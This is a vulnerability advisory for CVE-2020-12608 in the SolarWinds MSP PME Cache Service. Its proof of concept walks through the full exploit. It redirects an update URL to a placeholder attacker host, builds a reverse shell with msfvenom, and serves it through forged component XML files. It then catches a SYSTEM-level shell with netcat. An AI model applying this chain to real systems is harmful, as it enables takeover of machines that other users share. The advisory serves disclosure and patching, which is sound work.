what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

SolarWinds MSP PME Cache Service Insecure File Permissions / Code Execution

SolarWinds MSP PME Cache Service Insecure File Permissions / Code Execution
Posted May 7, 2020
Authored by Jens Regel

SolarWinds MSP PME Cache Service versions prior to 1.1.15 suffer from insecure file permission and code execution vulnerabilities.

tags | exploit, vulnerability, code execution
advisories | CVE-2020-12608
SHA-256 | 48f33d0d336e80e69deaf12e06fcac8f18ff3c6cfc521618d9a105e600701cb3

SolarWinds MSP PME Cache Service Insecure File Permissions / Code Execution

Change Mirror Download
Title: SolarWinds MSP PME Cache Service - Insecure File Permissions /
Code Execution
Author: Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG
GitHub: https://github.com/jensregel/Advisories/tree/master/CVE-2020-12608
CVSSv3: 8.2 [CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H]
CVE: CVE-2020-12608
CWE: 276

Vulnerable version
==================
SolarWinds MSP PME (Patch Management Engine) before 1.1.15

Timeline
========
2020-04-24 Vulnerability discovered
2020-04-27 Send details to SolarWinds PSIRT
2020-04-27 SolarWinds confirmed the vulnerability
2020-05-05 SolarWinds released PME version 1.1.15
2020-05-06 Public disclosure

Description
===========
An error with insecure file permissions has occurred in the SolarWinds
MSP Cache Service, which is part of the Advanced Monitoring Agent and
can lead to code execution. The SolarWinds MSP Cache Service is
typically used to get new update definition files and versions for
ThirdPartyPatch.exe or SolarWinds MSP Patch Management Engine Setup. The
XML file CacheService.xml in %PROGRAMDATA%\SolarWinds
MSP\SolarWinds.MSP.CacheService\config\ is writable by normal users, so
that the parameter SISServerURL can be changed, which controls the
location of the updates. After some analysis, we were able to provide
modified XML files (PMESetup_details.xml and
ThirdPartyPatch_details.xml) that point to an executable file with a
reverse TCP payload using our controlled SISServerURL web server for
SolarWinds MSP Cache Service.

Proof of Concept (PoC)
======================
As we can see, NTFS change permissions are set to CacheService.xml by
default. Any user on the system who is in group users can change the
file content. This is especially a big problem on terminal servers or
multi-user systems.

PS C:\ProgramData\SolarWinds MSP\SolarWinds.MSP.CacheService\config>
icacls .\CacheService.xml
.\CacheService.xml VORDEFINIERT\Benutzer:(I)(M)
NT-AUTORITÄT\SYSTEM:(I)(F)
VORDEFINIERT\Administratoren:(I)(F)

1. Modify CacheService.xml

In the xml file, the parameter SISServerURL was adjusted, which now
points to a web server controlled by the attacker.

<?xml version="1.0" encoding="utf-8"?>
<Configuration>
<CachingEnabled>True</CachingEnabled>
<ApplianceVersion>1.1.14.2223</ApplianceVersion>
<CacheLocation>C:\ProgramData\SolarWinds
MSP\SolarWinds.MSP.CacheService\cache</CacheLocation>
<CacheSizeInMB>10240</CacheSizeInMB>
<SISServerURL>https://evil-attacker.example.org</SISServerURL>
<LogLevel>5</LogLevel>
<Proxy></Proxy>
<ProxyEncrypt>AQAAANCMnd8BFdER(...)</ProxyEncrypt>
<ProxyCacheService />
<CacheFilesDeleted></CacheFilesDeleted>
<CacheDeletedInBytes></CacheDeletedInBytes>
<HostApplication>RMM</HostApplication>
<CanBypassProxyCacheService>True</CanBypassProxyCacheService>
<BypassProxyCacheServiceTimeoutSeconds>1</BypassProxyCacheServiceTimeoutSeconds>
<ComponentUpdateMinutes>300</ComponentUpdateMinutes>
<ComponentUpdateDelaySeconds>1</ComponentUpdateDelaySeconds>
</Configuration>

2. Payload creation

Generate an executable file, for example using msfvenom, that
establishes a reverse tcp connection to the attacker and store it on the
web server.

msfvenom -p windows/x64/shell_reverse_tcp lhost=x.x.x.x lport=4444 -f
exe > /tmp/solarwinds-shell.exe

3. Prepare web server

Place the modified xml files (PMESetup_details.xml or
ThirdPartyPatch_details.xml) on the web server in the path
/ComponentData/RMM/1/, calculate MD5, SHA1 and SHA256 checksums of the
executable, set correct values for SizeInBytes and increase the version.

Example of PMESetup_details.xml

<ComponentDetails>
<Name>Patch Management Engine</Name>
<Description>Patch Management Engine</Description>
<MD5Checksum>7a4a78b105a1d750bc5dfe1151fb70e1</MD5Checksum>
<SHA1Checksum>3d9ed6bd44b5cf70a3fed8f511d9bc9273a1feac</SHA1Checksum>
<SHA256Checksum>
80579df2533d54fe9cbc87aed80884f6a97e1ccdd0443ce2bcb815ef59ed3d65
</SHA256Checksum>
<SizeInBytes>7168</SizeInBytes>
<DownloadURL>/ComponentData/RMM/1/solarwinds-shell.exe</DownloadURL>
<FileName>solarwinds-shell.exe</FileName>
<Architecture>x86,x64</Architecture>
<Locale>all</Locale>
<Version>1.1.14.2224</Version>
</ComponentDetails>

Example of ThirdPartyPatch_details.xml

<ComponentDetails xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<Name>Third Party Patch</Name>
<Description>
Third Party Patch application for Patch Management Engine RMM v 1 and later
</Description>
<MD5Checksum>7a4a78b105a1d750bc5dfe1151fb70e1</MD5Checksum>
<SHA1Checksum>3d9ed6bd44b5cf70a3fed8f511d9bc9273a1feac</SHA1Checksum>
<SHA256Checksum>
80579df2533d54fe9cbc87aed80884f6a97e1ccdd0443ce2bcb815ef59ed3d65
</SHA256Checksum>
<SizeInBytes>7168</SizeInBytes>
<DownloadURL>/ComponentData/RMM/1/solarwinds-shell.exe</DownloadURL>
<FileName>solarwinds-shell.exe</FileName>
<Architecture>x86,x64</Architecture>
<Locale>all</Locale>
<Version>1.2.1.95</Version>
</ComponentDetails>

4. Malicious executable download

After restarting the system or reloading the CacheService.xml, the
service connects to the web server controlled by the attacker and
downloads the executable file. This is then stored in the path
%PROGRAMDATA%\SolarWinds MSP\SolarWinds.MSP.CacheService\cache\ and
%PROGRAMDATA%\SolarWinds MSP\PME\archives\.

[24/Apr/2020:10:57:01 +0200] "HEAD
/ComponentData/RMM/1/solarwinds-shell.exe HTTP/1.1" 200 5307 "-" "-"
[24/Apr/2020:10:57:01 +0200] "GET
/ComponentData/RMM/1/solarwinds-shell.exe HTTP/1.1" 200 7585 "-" "-"

5. Getting shell

After a certain time the executable file is executed by SolarWinds MSP
RPC Server service and establishes a connection with the rights of the
system user to the attacker.

[~]: nc -nlvp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from [x.x.x.x] port 4444 [tcp/*] accepted (family 2, sport 49980)
Microsoft Windows [Version 10.0.18363.778]
(c) 2019 Microsoft Corporation. Alle Rechte vorbehalten.

C:\WINDOWS\system32>whoami
whoami
nt-authority\system

C:\WINDOWS\system32>

Fix
===
There is a new PME version 1.1.15 which comes with auto-update
https://success.solarwindsmsp.com/forum-post/X0D51T00007TMk6jSAD/

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close